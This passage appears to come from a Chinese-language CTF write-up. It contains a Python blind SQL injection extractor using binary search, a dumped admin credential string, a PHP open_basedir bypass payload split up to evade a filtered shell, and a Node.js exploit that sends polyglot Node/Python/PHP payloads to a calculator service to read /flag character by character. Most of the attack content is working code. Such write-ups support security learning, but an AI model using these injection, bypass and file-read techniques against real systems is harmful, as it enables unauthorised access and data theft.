           for y in range(1, 64):
               db_name_payload = "ascii(substr((" + db_data + "),%d,1))" % (
                   y)
               db_name += chr(half(db_name_payload))
   
           print("> " + db_name)
           if db_name == "":
               break
   
   def half(payload):
       low = 0
       high = 126
       # print(standard_html)
       while low <= high:
           mid = (low + high) / 2
           mid_num_payload = "%s/**/>/**/%d" % (payload, mid)
           # print(mid_num_payload)
           # print(mid_html)
           if http_get(mid_num_payload):
               low = mid + 1
           else:
               high = mid - 1
       mid_num = int((low + high + 1) / 2)
       return mid_num
   
   
   if __name__ == '__main__':
       main()

当前数据库：giftbox
数据库中的表：users
表中的列：
值：id
值：username
值：password
列中的数据：
username值：admin
password值：hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}

之后使用如下命令登录

login admin hint{G1ve_u_hi33en_C0mm3nd-sh0w_hiiintttt_23333}

4. bypass open_basedir

参考：https://xz.aliyun.com/t/4720

payload

chdir('css');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('flag'));

根据这个受限的shell，发现是要对上面的payload进行切分，而且此处过滤了很多字符。此处可以使用如下fuzz字典来对那些值被过滤了进行fuzz，测试完之后就可以构造拼接了。

先看目前的路径以及需要向外跳几次

targeting p print_r
targeting v getcwd
targeting w $n
targeting x {$p($v())}
launch

确认完是两层后构造payload直接打就行了

targeting a chdir
targeting b css
targeting c {$a($b)}
targeting d ini_set
targeting e open_basedir
targeting f ..
targeting g {$d($e,$f)}
targeting h {$a($f)}
targeting i {$a($f)}
targeting j base64_
targeting k decode
targeting l $j$k
targeting m Ly8v
targeting n {$l($m)}
targeting o {$d($e,$n)}
targeting p print_r
targeting q file_get_
targeting r contents
targeting s $q$r
targeting t flag
targeting u {$p($s($t))}
launch

PS: 其实那天晚上就出了，但是被这个界面回显给整蒙了, emmmmmm

0x05 9calc

题目描述

calcalcalc again and again…

9-calc-eposide.3

题目解答

参考wp:https://github.com/zsxsoft/my-ctf-challenges/tree/master/calcalcalc-family

EXP:

const axios = require('axios')
const url = 'http://45.77.242.16/calculate'
const symbols = '0123456789abcdefghijklmnopqrstuvwxyz{}_'.split('')

const payloads = [
	// Nodejs
	`1 + 0//5 or '''\n//?>\nrequire('fs').readFileSync('/flag','utf-8')[{index}] == '{symbol}' ? 1 : 2;/*<?php\nfunction open(){echo MongoDB\\BSON\\fromPHP(['ret' => '1']);exit;}?>*///'''`,

	// Python
	`(open('/flag').read()[{index}] == '{symbol}') + (str(1//5) == 0) or 2 or ''' #\n))//?>\nfunction open(){return {read:()=>'{flag}'}}function str(){return 0}/*<?php\nfunction open(){echo MongoDB\\BSON\\fromPHP(['ret' => '1']);exit;}?>*///'''`,

	// PHP
	`len('1') + 0//5 or '''\n//?>\n1;function len(){return 1}/*<?php\nfunction len($a){echo MongoDB\\BSON\\fromPHP(['ret' => file_get_contents('/flag')[{index}] == '{symbol}' ? "1" : "2"]);exit;}?>*///'''`,

]
const rets = []

const checkAnswer = (value) => axios.post(url, {
	expression: {
		value,
		_bsontype: "Symbol"
	},
	isVip: true
}).then(p => p.data.ret === '1').catch(e => {})

const fn = async () => {

	for (let j = 0; j < payloads.length; j++) {
		const payload = payloads[j]
		let flag = ''
		let index = 0
		while (true) {
			for (let i = 0; i < symbols.length; i++) {
				const ret = await checkAnswer(payload.replace(/\{flag\}/g, flag + symbols[i]).replace(/\{symbol\}/g, symbols[i]).replace(/\{index\}/g, index))
				if (ret) {
					flag += symbols[i]
					console.log(symbols[i])
					i = 0
					index++
				}
			}
			break
		}
		rets.push(flag)
		console.log(rets)
	}

}

fn().then(p => {
	console.log(rets.join(''))
})

PS: 这个系列随后得再review一下